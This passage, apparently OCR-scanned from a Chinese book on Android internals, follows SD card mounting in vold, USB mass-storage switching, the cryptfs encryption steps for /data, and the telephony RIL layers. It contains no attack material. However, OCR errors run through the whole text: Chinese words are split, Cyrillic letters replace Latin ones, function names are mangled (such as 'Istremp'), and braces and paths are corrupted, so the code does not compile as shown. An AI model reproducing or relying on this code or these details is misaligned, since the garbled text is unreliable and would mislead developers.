过 函数 接收 和 处 理 uevent 事件 ， 主 要 代码 如 下 所 示 。 
private void listenToSocket() { 
LocalSocket socket = null; 
try{ 
socket = new LocalSocket(); 
LocalSocketAddress address = new LocalSocketAddress(VOLD_SOCKET, 
LocalSocketAddress.Namespace.RESERVED); 
socket.connect(address); 


6. mount SDCARD 处 理 


在 Android 系统 中 ， 当 启动 文件 MountListener.java 后 会 挂 载 SDCARD。 文 件 frameworks/base/services/ 
java/com/android/server/MountListener.java 的 主要 代码 如 下 所 示 。 
private static final String VOLD_CMD_SEND_UMS_STATUS = "send_ums_status"; 
private static final String VOLD_CMD_MOUNT_VOLUME = "mount_volume:"; 
private void listenToSocket() ( 
LocalSocket socket = null; 
try{ 
socket = new LocalSocket(); 
LocalSocketAddress address = new LocalSocketAddress(VOLD SOCKET, 
LocalSocketAddress.Namespace.RESERVED); 
socket.connect(address); 
writeCommand(VOLD_CMD_SEND_UMS_STATUS); 
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mountMedia(Environment.getExternalStorageDirectory().getAbsolutePath()); 


} 

在 文件 frameworks/base/core/java/android/os/Environment.java 中 定义 了 ExternalStorageDirectory, 具体 代 
码 如 下 所 示 。 

private static final File EXTERNAL STORAGE DIRECTORY 

= getDirectory"EXTERNAL STORAGE", "/sdcard"); 
public void mountMedia(String mountPoint) { 
writeCommand2(VOLD CMD MOUNT VOLUME, mountPoint); 

} 

因为 mountPoint 值 为 /sdcard， 所 以 向 vold socket 发 送 一 个 VOLD_CMD_MOUNT VOLUME 命令 后 ， 
此 命令 会 调用 处 理 文件 system/core/vold/Cmd_dispatch.c 部 分 ， 具 体 代 码 如 下 所 示 。 

static struct cmd dispatch dispatch_table[ ] = ( 


(VOLD CMD SEND UMS STATUS, do send ums status ), 
{VOLD CMD MOUNT VOLUME, do mount volume }, 


k 
static int do mount volume(char *cmd) 
{ 
return volmgr start volume by mountpoint(&cmd[strlen("mount volume:")]); 
} 


然后 调用 文件 system/core/vold/Volmgr.c 部 分 ， 具 体 代 码 如 下 所 示 。 
int volmgr start volume by mountpoint(char *mount point) 


{ 
volume t*v; 
v 7 volmgr lookup volume by mountpoint(mount point, true); 
if( volmgr consider disk and vol(v, v->dev->disk) < 0) ( 
LOGE("volmgr failed to start volume '%s'", v-»mount point); 
} 
return 0; 
} 


static volume t *volmgr lookup volume by mountpoint(char *mount point, boolean leave locked) 
{ 
volume_t *v = vol_root; 
while(v) { 
pthread_mutex_lock(&v->lock); 
if (Istremp(v-»mount point, mount_point)) { 
if (!leave_locked) 
pthread_mutex_unlock(&v->lock); 


return v; 
H 
pthread mutex unlock(&v-»lock); 
v = v-»next; 
} 
return NULL; 
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然后 在 链表 vol root 中 找到 对 应 的 节点 ， 主 要 代码 如 下 所 示 。 


static int _volmgr_consider disk and vol(volume t *vol, blkdev t *dev) 


{ 
part = blkdev lookup by devno(dev-»major, ALIGN MMC MINOR(dev-»minor) + 1); 
гс = volmgr start(vol, part); 
return rc; 
} 
struct volmgr_fstable_entry { 
char *name; 
int ("identify fn) (blkdev_t *dev); 
int (*check_fn) (blkdev t *dev); 
int (*mount fn) (blkdev t *dev, struct volume *vol, boolean safe mode); 
boolean case sensitive paths; 
k 


static struct volmgr fstable entry fs table[] = { 

|| | ("ext3", ext identify, ext check, ext mount , true}, 
{ "vfat", vfat identify, víat check, vfat mount , false }, 
( NULL, NULL, NULL, NULL , false) 

k 

static int. volmgr start(volume t *vol, blkdev t *dev) 


í 
for (fs = fs table; fs->name; fs++) ( 


if (!fs->identify_fn(dev)) 
break; 


return volmgr start fs(fs, vol, dev); 


) 
static int volmgr start fs(struct volmgr fstable entry *fs, volume t *vol, blkdev t *dev) 
{ 

pthread_create(&vol->worker_thread, &attr, volmgr start fs thread, vol); 

return 0; 

H 
static void *volmgr start fs thread(void *arg) 
{ 

rc = fs->mount fn(dev, vol, safe_mode); 
} 


然后 通过 文件 system/core/vold/Volmgr vfat.c 将 mount. fn 转向 vfat mount， 有 具体 代码 如 下 所 示 。 
int víat mount(blkdev t *dev, volume t “vol, boolean safe mode) 
{ 
int flags, rc; 
char *devpath; 
devpath = blkdev_get_devpath(dev); 
#if VFAT_DEBUG 


@ _ 


第 6 章 xw — 


LOG VOL('vfat mount(%d:%d, %s, %d):", dev->major, dev->minor, vol->mount_point, safe mode); 
#endif 
flags = MS_NODEV | MS_NOEXEC | MS_NOSUID | MS_DIRSYNC; 
if (vol->state == volstate mounted) ( 
LOG VOL("Remounting %d:%d on %s, safe mode 96d", dev->major, 
dev->minor, vol-»mount point, safe mode); 
flags |= MS. REMOUNT; 
} 
n 
* Note: This is a temporary hack. If the sampling profiler is enabled, 
* we make the SD card world-writable so any process can write snapshots. 
* TODO: Remove this code once we have a drop box in system server. 
7 
char value[PROPERTY VALUE МАХ]; 
property get("persist.sampling profiler", value, ""); 
if (value[0] == '1') ( 
LOGW('The SD card is world-writable because the" 
"'persist.sampling_profiler' system property is set to '1'."); 
гс = mount(devpath, vol-»mount point, "vfat", flags, 
“utf8, uid=1000,gid=1015,fmask=000,dmask=000,shortname=mixed"); 
) else { 
n 
* The mount masks restrict access so that: 
* 1. The 'system' user cannot access the SD card at all - 
А (protects system_serverfrom grabbing file references) 
* 2. Group users can RWX 
* 3. Others can only RX 
U 
rc = mount(devpath, vol->mount_point, "vfat", flags, 
“utf8, uid=1000,gid=1015,fmask=702,dmask=702,shortname=mixed"); 
} 
if (rc && errno == EROFS) { 
LOGE("vfat_mount(%d:%d, %s): Read only filesystem - retrying mount RO", 
dev->major, dev->minor, vol->mount_point); 
flags |= MS_RDONLY; 
rc = mount(devpath, vol->mount_point, "vfat", flags, 
“utf8,uid=1000,gid=1015,fmask=702,dmask=702,shortname=mixed"); 
} 
if (rc == 0) { 
char *lost_path; 
asprintf(&lost_path, "%s/LOST.DIR", vol->mount_point); 
if (access(lost_path, F_OK)) { 
r 
* Create a LOST.DIR in the root so we have somewhere to put 
* lost cluster chains (fsck msdos doesn't currently do this) 
*/ 
if (mkdir(lost_path, 0755)) { 
LOGE("Unable to create LOST.DIR (%s)", strerror(errno)); 
} 
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free(lost path); 
} 
sif VFAT DEBUG 
LOG VOL('vfat mount(%s, %d:%d): mount rc = %d", dev->major,k dev->minor, 
vol-»mount point, rc); 


#endif 
free (devpath); 
return rc; 

} 


到 此 为 止 ， 就 完成 了 SDCARD 的 真正 被 挂 载 操作 。 
7. switch USB 处 理 


在 前 面 讲 解 的 挂 载 USB 部 分 时 曾经 提 到 过 ， 当 simulate_uevent("switch", devpath, "add", uevent params) 
产生 add 事件 后 会 在 文件 system/core/vold/Cmd_dispatch.c 中 分 配 一 个 如 下 所 示 的 处 理 。 
static int handle switch event(struct uevent *event) 
{ 
char *name = get uevent param(event, "SWITCH_NAME"); 
char *state = get uevent param(event, "SWITCH STATE"); 
if (Istremp(name, "usb mass storage") { 
if (Istremp(state, "online")) { 
ums hostconnected set(true); 
) else { 
ums hostconnected set(false); 
volmgr enable umsí(false); 


} 


} 

文件 systenvcore/vold/Ums.c 中 国 数 ums_hostconnected_set0 会 向 vold socket 发 送 一 个 VOLD_EVT_UMS_ 
CONNECTED 消息 。 具 体 代 码 如 下 所 示 。 

void ums hostconnected set(boolean connected) 


{ 


send msg(connected ? VOLD_EVT_UMS_CONNECTED : VOLD EVT UMS DISCONNECTED); 
} 
上 述 VOLD EVT UMS CONNECTED 消息 会 在 文件 frameworks/base/services/java/com/android/server/ 
MountListenerjava 中 进行 处 理 ， 主 要 代码 如 下 所 示 。 
/vold commands 
private static final Sting VOLD CMD ENABLE UMS = "enable ums"; 
private static final Sting VOLD CMD DISABLE UMS - "disable ums"; 
private static final Sting VOLD СМО SEND UMS STATUS = "send ums status"; 


11 vold events 

private static final Sting VOLD EVT UMS ENABLED = "ums enabled"; 

private static final Sting VOLD EVT UMS DISABLED - "ums disabled"; 

private static final Sting VOLD EVT UMS CONNECTED - "ums connected"; 
private static final Sting VOLD EVT UMS DISCONNECTED - "ums disconnected"; 
private void listenToSocket() ( 


LocalSocket socket - null; 
e. 
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try{ 
socket = new LocalSocket(); 
LocalSocketAddress address = new LocalSocketAddress(VOLD_SOCKET, 
LocalSocketAddress. Namespace.RESERVED); 
socket.connect(address); 
InputStream inputStream = socket.getlnputStream(); 
mOutputStream = socket.getOutputStream(); 


while (true) { 
int count = inputStream.read(buffer); 
if (count < 0) break; 
int start = 0; 
for (int i = 0; і < count; i++) { 
if (buffer[i] == 0) { 
String event = new String(buffer, start, i - start); 
handleEvent(event); 
start =i+1; 


} 
private void handleEvent(String event) { 
if (Config.LOGD) Log.d(TAG, "handleEvent " + event); 
int colonIndex = event.indexOf(':'); 
String path = (colonIndex > 0 ? event.substring(colonIndex + 1) : null); 


Jelse if (event.equals(VOLD_EVT_UMS_CONNECTED)){ 
mUmsConnected = true; 
mService.notifyUmsConnected(); 
} ... 
这 样 通过 服务 mService(mount service) 中 的 函数 notifyUmsConnected0 广 播 到 下 一 状态 后 ， 会 再 绕 回 到 
MountListenser 模块 中 , 并 调用 函数 setMassStorageEnabled0) 发 送 一 个 连接 USB 的 命令 , 具体 代码 如 下 所 示 。 
void setMassStorageEnabled(boolean enable) ( 
writeCommand(enable ? VOLD СМО ENABLE UMS: VOLD СМО DISABLE UMS); 
} 
函数 notifyUmsConnected() 在 文件 frameworks/base/services/java/com/android/server/MountService.java 中 
жх, АИК Ктк. 
void notifyUmsConnected() ( 


setMassStorageEnabled(true); 


} 
public void setMassStorageEnabled(boolean enable) throws RemoteException { 


mListener.setMassStorageEnabled(enable); 
} 
当 向 vold socket 发 送 一 个 VOLD_CMD_ENABLE_UMS 命令 后 ， 该 命令 会 进行 如 下 所 示 的 处 理工 作 。 
{МОГО CMD ENABLE UMS, do set ums enable }, 
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在 文件 system/core/vold/Cmd dispatch.c 中 实现 上 述 处 理 功能 ， 具 体 代码 如 下 所 示 。 
static struct cmd dispatch dispatch table[] = ( 

{VOLD CMD ENABLE UMS, do set ums enable}, 
{VOLD CMD DISABLE UMS, do set ums enable }, 


static int do set ums enable(char *cmd) 


{ 
if (Istremp(cmd, VOLD СМО ENABLE UMS)) 
return volmgr enable ums(true); 
return volmgr enable ums(false); 
} 


然后 转向 文件 system/core/vold/Volmgr.c 的 执行 部 分 ， 有 具体 代码 如 下 所 示 。 
int volmgr enable ums(boolean enable) 


{ 
volume t *v = vol root; 
while(v) ( 
if (v-»ums path) { 
int rc; 
if (enable) ( 
pthread_mutex_lock(&v->lock); 
if (v->state == volstate_mounted) 
volmgr_send_eject_request(v); 
11 Stop the volume, and enable UMS іп the callback 
rc = volmgr shutdown volume(v, cb volstopped for ums enable, false); 
H 
} 
next vol: 
v = v->next; 
) 
return 0; 
} 
static void cb volstopped for ums enable(volume t *v, void *arg) 
{ 


if ((rc ums enable(devdir path, v->ums_path)) < 0) 


} 
再 转向 文件 system/core/vold/Ums.c 的 执行 部 分 ， 具 体 代码 如 下 所 示 。 
int ums enable(char *dev fspath, char *lun syspath) 
{ 
LOG_VOL("ums_enable(%s, %s):", dev fspath, lun syspath); 
int fd; 
char filename[255]; 
sprintf(filename, "/sys/%s/file", lun syspath); 
if (fd = open(filename, О WRONLY)) < 0) ( 
LOGE("Unable to open '%s' (%s)", filename, strerror(errno)); 
return -errno; 


(m, 


if (write(fd, dev fspath, strlen(dev fspath)) < 0) ( 
LOGE("Unable to write to ums lunfile (%s)", strerror(ermo)); 
close(fd); 
return -errno; 

} 

close(fd); 

return 0; 


} 
到 此 为 止 ，vold.conf 文件 成 功 配置 了 SDCARD #1 USB 的 系统 设备 路 径 。 
volume sdcard { 

## This is the direct uevent device path to the SD slot on the device 


media path Idevices/platform/msm sdcc.2/mmc host/mmc1 
emu media path Idevices/platform/goldfish mmc.0/mmc host/mmcO 
media type mmc 

mount point Isdcard 

ums path Idevices/platform/usb mass storage/lunO 


} 

这 样 当 启动 vold 程序 后 会 加 载 SDCARD 卡 到 /sdcard 目录 下 ， 其 中 ，media_path 的 路 径 是 cd/ 
sys/class;mmc_host/mmc?/ (? 表示 0 或 1 等 ) ， 接 下 来 就 可 以 使 用 pwd 所 获得 的 真实 路 径 了 。 当 有 USB 连 
接 时 ， 被 要 求 使 用 MASS STORAGE 模式 时 ， 则 会 停止 SDCARD 作为 内 部 ， 而 作为 USB 存储 器 。 
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要 想 在 Android 3.0 以 上 设备 中 添加 加 密 功 能 ， 需 要 满足 如 下 两 个 条 件 。 

C1) /data 分 区 必须 是 支持 块 设备 形式 的 接口 设备 ， 其 中 eMMC 是 首选 ， 因 为 整个 加 密 的 都 是 基于 内 
核 的 工作 于 快 设备 之 上 的 dm-crypt 层 。 

(2) 在 文件 system/vold/cryptfs.c 中 ， 函 数 get_fs_size() 会 默认 将 data 分 区 的 文件 系统 认为 是 ext4， 这 
只 是 对 该 分 区 最 后 的 用 来 存放 crypto footer 的 16KB 的 空间 进行 错误 检查 操作 ， 以 确保 data 分 区 的 文件 系统 
没有 用 到 这 最 后 的 16KB 的 空间 。 函 数 get_fs_size() 在 开发 阶段 比较 有 用 ， 因 为 此 时 data 分 区 的 大 小 会 经 党 
变动 ， 但 是 到 了 release 阶段 后 就 不 是 必需 的 了 。 如 果 没 有 使 用 ext4 的 文件 系统 ， 就 需要 把 该 函数 删除 并 去 
掉 对 其 的 调用 ， 或 者 对 其 进行 修改 以 适用 于 所 使 用 的 文件 系统 。 

目前 第 一 次 release 只 支持 Inplace 加 密 方式 ,加 密 设备 需要 关闭 Framework 并 Umount data (ABE) 
分 区 ， 以 对 设备 进行 逐鹿 区 的 加 密 。 加 密 完成 后 系统 会 重启 进入 启动 加 密 的 Android 系统 的 部 分 的 流程 。 具 
体 的 加 密 流程 如 下 所 示 。 

CD 当 用 户 通过 UI 选 择 了 加 密 设 备 时 ， 此 时 系统 会 检测 设备 是 否 已 经 充满 了 电 ， 并 确保 插 上 了 AC Ж 
电器 在 充电 ， 这 样 以 保证 在 整个 加 密 的 过 程 中 有 足够 的 电量 来 完成 加 密 工作 。 因 为 在 加 密 的 过 程 中 ， 一 且 
设备 没有 了 电 ， 那 么 设备 上 的 数据 就 会 处 于 一 个 部 分 加 密 的 状态 。 这 时 设备 只 能 做 factory reset 的 操作 ， 此 
时 将 会 丢失 所 有 的 数据 。 当 用 户 通过 一 系列 的 确认 操作 之 后 ， 系 统 就 会 使 用 用 户 的 password 来 调用 Vold 对 
设备 进行 加 密 。 

(2) Vold 首先 会 进行 错误 检查 操作 以 确认 加 密 是 否 可 以 进行 ， 如 果 加 密 不 可 以 进行 将 会 返回 -1， 并 同 
时 在 log (日 志 ) 中 打印 输出 具体 的 原因 。 如 果 加 密 可 以 进行 ， 则 Vold 会 设置 系统 属性 vold.decrypt 的 值 为 
tirgger shutdown framework， 这 样 将 会 触发 init'rc 文件 去 停止 类 late. state 和 类 main 中 的 service, FH. vold 
接 下 来 会 对 /mnt/scard 和 /data 执行 umount 操作 。 


9) 
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(3) 如 果 是 以 Inplace 方式 来 加 密 ，Vold 会 在 tmpfs 上 挂 载 一 个 临时 的 data 分 区 (使 用 ro.crypto. 
tmpfs options 的 值 来 作 挂 载 参 数 ) ， 并 同时 设置 系统 属性 vold.encrypt_progress 的 值 为 0， 然后 Vold 会 对 tmpfs 
的 临时 data 分 区 的 文件 系统 做 一 些 准备 工作 。 之 后 Vold 会 设置 vold.decrypt 为 trgger restart тіп framework, 这 
样 会 触发 initrc 把 关 掉 的 main 类 别 的 service 重 新 启动 .这 时 Framework 会 启动 并 检测 到 vold.encrypt_progress 
的 值 ， 如 果 此 值 为 0 则 会 显示 一 个 进度 条 ， 并 每 5 秒 读 取 一 次 该 属性 的 值 以 更 新 进度 条 的 值 。 

(4) 接 下 来 Vold 会 设置 crypto 映射 ， 此 时 会 创建 一 个 虚拟 的 crypto 块 设备 ， 并 将 对 应 的 关联 映射 到 
真正 的 data 分 区 所 在 的 块 设备 。 整 个 加 密 和 解密 过 程 都 是 按 所 写 入 或 读 出 的 扇 区 来 进行 的 ， 接 下 来 创建 并 
写 入 crypto footer. crypto footer 包含 了 加 密 的 一 些 信息 及 用 来 解密 的 密 钥 (master key) ， 密 钥 是 通过 读 取 
/dev/urandom 得 到 的 一 个 128 位 的 数字 , 并 且 系 统 会 使 用 SSL 库 的 函数 PBKDF2 对 用 户 的 密码 进行 hash 处 
理 以 实现 密 保护 , 并 且 crypto footer 也 包含 了 一 个 随机 种 子 值 (从 /dev/urandom 得 到 ) ,目的 是 增加 PBKDF2 
的 hash 值 的 信息 烂 ， 并 阻止 password 受到 rainbow table 的 攻击 破解 。 与 此 同时 ，crypto footer 中 的 
CRYPT_ENCRYPTION_IN_PROGRESS 也 会 被 设置 为 对 应 的 值 来 表明 加 密 是 否 成 功 。 因 为 crypto footer 会 
被 存放 在 /data 所 在 的 分 区 的 最 后 16KB， 所 以 data 分 区 的 文件 系统 是 不 占用 到 这 个 部 分 的 。 

(5) 如 果 在 加 密 时 使 用 了 wipe 选项 ，vold 将 会 使 用 make_ext4fs 来 对 该 分 区 进行 格式 化 处 理 。 此 时 需 
要 注意 ， 不 要 把 最 后 的 16KB 区 域 放 到 data 分 区 的 文件 系统 。 如 果 采 用 的 是 Inplace 加 密 方式 ，vold 将 会 从 
真正 的 块 设 备 读 取 每 一 扇 区 的 值 ， 并 将 读 取 的 值 写 入 加 密 的 块 设备 。 

(6) 无 论 采用 哪 一 种 加 密 方式 ，Vold 会 在 加 密 成 功 后 把 crypt footer 中 的 ENCRYPTION IN PROGRESS 
的 值 清理 掉 并 重新 启动 系统 。 如 果 在 重启 系统 时 有 错误 发 生 ，Vold 会 设置 vold.encrypt progress 的 值 为 
error reboot_failde， 并 且 UI 会 让 用 户 选择 重启 。 

CD 如 果 在 加 密 过 程 中 发 生 了 错误 ， 但 此 时 的 数据 还 没有 开始 被 加 密 ，Vold 会 把 属性 vold.encrypt_ 
progress 的 值 设置 为 error_not_encrypted， 并 且 让 用 户 选 择 重启 ， 并 通知 用 户 加 密 正在 进行 。 如 果 在 出 现 进 
度 条 之 前 关 掉 Framework 后 发 生 错误 ， 则 Vod 会 直接 重启 系统 。 此 时 如 果 重 启 失败 ，Vold 会 设置 
vold.encrypt_progress 的 值 为 error_shutting_ down， 并 返回 -1。 

(8) 在 真正 对 块 设备 进行 加 密 操 作 时 如 果 检 测 到 错误 ，Vold 会 设置 vold.encrypt_progress 为 
error_partially_encrypted， 并 返回 -1。 此 时 系统 会 弹出 信息 框 提示 用 户 加 密 失 败 ， 并 允许 用 户 选择 对 设备 进 
行 Factory Reset (恢复 出 厂 设置 ) 。 

(9) 当 需 要 对 加 密 密 码 进行 修改 时 ， 系 统 会 通过 cryptfs changepw 来 发 送 通知 ， 通 知 Vold 重新 使 用 新 
的 密码 对 密 钥 (master key) 进行 加 密 保护 。 
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对 于 一 款 Android 手机 设备 来 说 ， 其 最 重要 的 功能 便 是 实现 通信 处 理 ， 例 如， 拨打 /接听 电话 和 收发 短 
i 等。 在 实现 上 述 通 信 功 能 的 过 程 中 ，Android 需要 确保 这 些 信息 的 安全 性 。 本 章 将 详细 讲解 Android 
系统 实现 电话 系统 安全 的 基本 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


7.1 Android 电话 系统 详解 


E 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 7 章 \Android 电话 系统 详解 .avi 

Android 系统 作为 一 款 流行 的 智能 手机 平台 ， 电 话 〈Telephony) 部 分 功能 自然 十 分 重要 。 电 话 系统 的 主 
要 功能 是 呼叫 (Call) 、 短 信 (SMS) 、 数 据 连接 (Data Connection) 、SIM 卡 和 电话 本 等 功能 。 本 书 将 介 
绍 绝 大 多 数 功能 的 实现 框架 。 


7.1.1 电话 系统 简介 


Android 的 Radio Interface Layer (RIL) 提供 了 电话 服务 和 Radio 硬件 之 间 的 抽象 层 。RIL 负责 数据 的 
可 靠 传 输 、AT 命令 的 发 送 以 及 response 的 解析 。 应 用 处 理 器 通过 AT 命令 集 与 带 GPRS 功能 的 无 线 通信 模 
块 通信 。AT command 是 由 Hayes 公司 发 明 的 ， 是 一 个 调制 解 调 器 制造 商 采 用 的 一 个 调制 解 调 器 命令 语言 ， 
每 条 命令 以 字母 AT 开头 。 

在 Android 系统 中 ， 实 现 电话 功能 部 分 的 具体 说 明 如 下 所 示 。 

(1) 结构 体 RIL_RadioFunctions 

在 hardware/ril/include/telephony/ 目 录 中 ,文件 ril.h 是 让 部 分 的 基础 头 文件 ,其 中 定义 的 结构 体 RIL_Radio 
Functions 的 代码 如 下 所 示 。 

typedef struct ( 

int version; 

RIL RequestFunc onRequest; 

RIL_RadioStateRequest onStateRequest; 

RIL. Supports supports; 

RIL. Cancel onCancel; 

RIL  GetVersion getVersion; 

) RIL RadioFunctions; 

在 结构 体 RIL_RadioFunctions 中 包含 了 儿 个 函数 指针 的 结构 体 , 这 实际 上 是 一 个 移植 层 的 接口 。 在 实现 
下 层 的 库 之 后 ， 由 rild 守护 进程 得 到 这 些 函 数 指针 ， 执 行 对 应 的 函数 。 

其 中 儿 个 重要 的 函数 指针 的 原型 如 下 所 示 。 

typedef void (*RIL_RequestFunc) (int request, void *data, 

size tdatalen, RIL Token t); 

typedef RIL_RadioState (*RIL RadioStateRequest)(); 

typedef int (*RIL_Supports)(int requestCode); 


ез 


typedef void (*RIL_Cancel)(RIL_Token t); 
typedef const char * (*RIL GetVersion) (void); 
其 中 最 为 重要 的 函数 是 onRequest()， 这 是 一 个 请 求 执行 的 函数 。 
(2) rild 守护 进程 
在 Android 系统 中 ，rild 守护 进程 的 实现 文件 包含 在 hardware/ril/rild 目录 中 ， 其 中 包含 了 文件 rild.c 和 
radiooptions.c， 这 个 目录 中 的 文件 经 过 编译 后 会 生成 一 个 可 执行 程序 ， 这 个 程序 在 系统 的 安装 路 径 如 下 。 
/system/bin/rild 
文件 rild.c 是 这 个 守护 进程 的 入 口 ， 具 有 一 个 主 函 数 的 入 口 main0， 执 行 的 过 程 是 将 请 求 转换 成 AT dir 
令 的 字符 串 , 给 下 层 的 硬件 执行 。 在 运行 过 程 中 , 使 用 dlopen 打开 /system/lib/ 路 径 中 名 称 为 libreference-ril.so 
的 动态 库 ， 然 后 从 中 取出 RIL_Init 符号 来 运行 。 
RIL Init 符号 是 一 个 函数 指针 ， 执 行 这 个 函数 后 ， 返 回 的 是 一 个 RIL_RadioFunctions 类 型 的 指针 。 得 到 
这 个 指针 后 ， 调 用 RIL_register0 函 数 ， 将 这 个 指针 注册 到 libril 库 之 中 ， 然 后 进入 循环 。 事实 上 ， 这 个 守护 
进程 提供 了 一 个 申请 处 理 的 框架 ， 而 具体 的 功能 都 是 在 libril.so 和 libreference-ril.so 中 完成 的 。 
(3) libreference-ril.so 动态 库 
在 Android 系统 中 ，libreference-ril.so 动态 库 的 路 径 如 下 所 示 。 
hardware/riyreference-ril 
HB, Android 电话 功能 的 主要 实现 文件 是 reference-ril.c 和 atchannel.c。 这 个 库 必须 实现 的 是 一 个 名 为 
RIL Init 的 函数 ， 这 个 函数 执行 的 结果 是 返回 一 个 RIL_RadioFunctions 结构 体 的 指针 ， 指 针 指 向 函数 指针 。 
这 个 库 在 执行 的 过 程 中 需要 创建 一 个 线程 来 执行 实际 的 功能 。 在 执行 的 过 程 中 ， 这 个 库 将 打开 一 个 
/dev/ttySXXX 的 终端 〈 终 端的 名 字 是 从 上 层 传 入 的 ) ， 然 后 利用 这 个 终端 控制 硬件 执行 。 
(4) libril.so 动态 库 
在 Android 系统 中 ，libril.so 库 的 目录 如 下 所 示 。 
hardware/ril/libril 
其 中 的 主要 文件 是 til.cpp， 此 库 需 要 实现 以 下 儿 个 接口 。 
RIL_startEventLoop(void); 
void RIL_setcallbacks (const RIL_RadioFunctions *callbacks); 
RIL_register (const RIL_RadioFunctions *callbacks); 
RIL onRequestComplete(RIL Token t, RIL Errno e, void *response, 
Size t responselen); 
void RIL onUnsolicitedResponse(int unsolResponse, void *data, 
size t datalen); 
RIL requestTimedCallback (RIL TimedCallback callback, void *param, 
const struct timeval *relativeTime); 


上 述 函 数 也 是 被 rild 守护 进程 调用 的 ， 不 同 的 vendor 可 以 通过 自己 的 方式 实现 这 儿 个 接口 ， 这 样 可 以 
保证 RIL 可 以 在 不 同系 统 中 移植 。 其 中 ， 函 数 RIL_register() 把 外 部 的 RIL_RadioFunctions 结构 体 注册 到 这 
个 库 之 中 ， 在 恰当 的 时 候 调 用 相应 的 函数 。 在 Android 电话 功能 执行 的 过 程 中 ， 这 个 库 处 理 了 一 些 将 请 求 
转换 成 字符 串 的 功能 。 


7.1.2 ”电话 系统 结构 


Android 电话 系统 主要 分 为 Modem 驱动 、RIL (Radio Interface Layer) 、 电 话 服 务 框架 和 应 用 共 4 层 结 
构 ， 具 体 结构 如 图 7-1 所 示 。 
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Android 电话 系统 的 代码 结构 如 图 7-2 所 示 。 


packages\apps\Phone\sre\comiandroidiphone\PhoneApp java 
packages\apps\Phone\src\comiandroid\phone\PhoneUtils java 
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图 7-2 电话 系统 的 代码 结构 
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由 图 7-2 可 知 ，Android 电话 系统 从 上 到 下 主要 包括 Java 应 用 、Java 框架 、 本 地 RIL 层 和 Modem 驱动 ， 
这 几 部 分 的 具体 说 明 如 下 所 示 。 
(1) Modem 驱动 
实现 电话 功能 的 主要 硬件 是 通信 模块 (Modem) , Modem 通过 与 通信 网 络 进行 沟通 传输 语音 及 数据 ， 
完成 呼叫 、 短 信 等 相关 电话 功能 。 对 于 大 部 分 目前 的 独立 通信 模块 而 言 ， 无 论 是 2G 还 是 3G 都 已 经 非常 成 
熟 ， 模 块 化 相当 完善 ， 硬 件 接口 非常 简单 ， 也 有 着 相对 统一 的 软件 接口 。 一 般 的 Modem 模块 装 上 SIM F, 
直接 上 电 即 可 工作 ， 自 动 完成 初始 的 找 网 、 网 络 注册 等 工作 ， 完 成 之 后 即 可 打 电 话 、 发 短信 等 。 但 独立 模 
块 因为 体积 问题 ， 在 手机 设计 中 较 少 使 用 ， 而 是 使 用 chip-on-board 的 方式 。 另 外 也 有 不 少 Modem 基带 与 应 
用 处 理 器 共存 。 
(2) RIL 硬件 抽象 层 
RIL 负责 数据 的 可 靠 传输 、AT 命令 发 送 以 及 Response 解析 功能 。 应 用 处 理 器 通过 AT 命令 集 和 带 GPRS 
功能 的 无 线 通信 模块 实现 通信 功能 。AT command 是 由 Hayes 公司 发 明 的 ， 是 一 个 调制 解 调 器 制造 商 采 用 的 
-个 调制 解 调 器 命令 语言 ， 每 条 命令 以 字母 AT 开头 。 
RIL 支持 的 本 地 代码 包括 RIL 库 和 守护 进程 ， 主 要 代码 路 径 如 下 所 示 。 
hardware/ril/include 
hardware/ril/libril 
hardware/ril/rild 
hardware/ril/reference-ril 


具体 编译 结果 如 下 所 示 。 
0 /system/bin/rild: 守护 进程 。 
О /system/lib/libril.so: 生成 RIL 库 。 
口 /system/lib/libreference-ril.so: 生成 RIL 参 考 库 。 
在 Android 电话 系统 中 没有 INI 部 分 ，RIL 守护 进程 通过 名 为 rild 的 Socker 和 Java 框架 层 进行 通信 。 
(3) Java 框架 
此 部 分 的 代码 路 径 如 下 所 示 。 
frameworks/base/telephony/java/ 
在 此 目录 中 存在 了 如 下 Java 类 。 
口 android/telephony: 实现 了 Java 类 android.telephony、android.telephony.gsm 以 及 android.telephony.cdma. 
0 com/android/internal/telephony: 实现 了 内 部 的 类 com.android.internal.telephony、com.android.internal. 
telephony.gsm 以 及 com.android.internal.telephony.cdma， 带 GSM 的 是 GSM 的 专用 协议 ， 而 不 带 的 是 
通用 部 分 。 
(4) Java 应 用 层 
在 电话 系统 中 ， 通 过 Service 实现 Phone 应 用 ， 并 同时 实现 Phone 的 UI 界面 逻辑 。 而 短信 和 网 络 选择 
分 别 在 MMS 和 Settings 应 用 中 实现 。 


7.1.3 ”了 驱动 程序 介绍 


在 介绍 驱动 移植 之 前 ， 需 要 先 了 解 rild 与 libril.so 以 及 librefrence_ril.so 的 关系 。 
(1) rild 
用 于 实现 一 个 main0) 函 数 作为 整个 RIL 层 的 入 口 点 ， 负 责 完成 初始 化 。 
(2) libril.so 
libril.so 与 rild 结合 相当 紧密 ,是 其 共享 库 , 在 编译 时 就 已 经 建立 了 这 一 关系 ,这 部 分 功能 通过 文件 ril.cpp 
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和 ril event.cpp 实现 ， 其 中 ， 文 件 libril.so 驻 留 在 rild 这 一 守护 进程 中 ， 主 要 完成 同上 层 通信 的 工作 ， 接 受 
RIL 请 求 并 传递 给 librefrence rilso， 同 时 把 来 自 librefrence ril.so 的 反馈 回 传 给 调用 进程 。 
(3) librefrence_ril.so 

rild 通 过 手动 的 dlopen 方 式 加 载 ,此 加 载 过 程 的 结合 稍微 松散 ,这 是 因为 librefrence.so 主要 负责 跟 Modem 
硬件 通信 的 缘故 ， 这 样 做 更 方便 蔡 换 或 修改 以 适 配 更 多 的 Modem 种 类 。 转 换 来 自 libril.so 的 请 求 为 AT 命 
令 ， 同 时 监控 Modem 的 反馈 信息 ， 并 传递 回 libril.so。 在 初始 化 时 ，rild 通过 符号 RIL_Init 获取 一 组 函数 指 
针 并 以 此 与 之 建立 联系 。 

(4) radiooptions 

radiooptions 通过 获取 启动 参数 ， 利 用 socket 和 rild 进行 通信 ， 可 供 调试 时 配置 Modem 参数 。 

经 过 前 面 内 容 的 介绍 , 可 知 移植 Modem 驱动 的 主要 工作 是 USB 转 Serial 接 口 , 以 及 实现 特殊 USB/Serial。 
上 述 驱 动 保 存在 如 下 目录 中 。 

drivers/usb/seral/ 

drivers/seral/ 

在 Android 电话 系统 的 Modem 驱动 中 ,通常 使 用 USB f£ Serial 标准 实现 AT 和 数据 通道 的 接口 ， 此 功 
